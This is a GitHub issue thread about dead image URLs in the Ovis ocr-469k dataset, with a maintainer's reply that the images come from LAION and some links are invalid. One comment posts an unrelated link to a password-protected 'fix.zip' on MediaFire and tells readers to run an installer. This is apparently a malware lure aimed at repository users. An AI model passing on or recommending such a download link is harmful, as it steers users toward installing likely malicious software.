### ISSUE TITLE
can not find ocr-469k images

### ISSUE THREAD

**Issue by luyao-cv** [AIDC-AI/Ovis#13]
i got the ocr-469k.parquet and find the images url, but can not download, for example:
{"caption": "BACKGROUND\nabstract design", "image_url": "https://static3.iclipart.com/thumbs/658/batch_01/000658-0001-003022_tnb.png"}
can not find https://static3.iclipart.com/thumbs/658/batch_01/000658-0001-003022_tnb.png

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luyao-cv** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

?

**Comment by runninglsy** [comment]
These images are from the Laion dataset, where only the image URLs are provided. Some URLs may be invalid, you can use the valid parts of the URLs for the data.
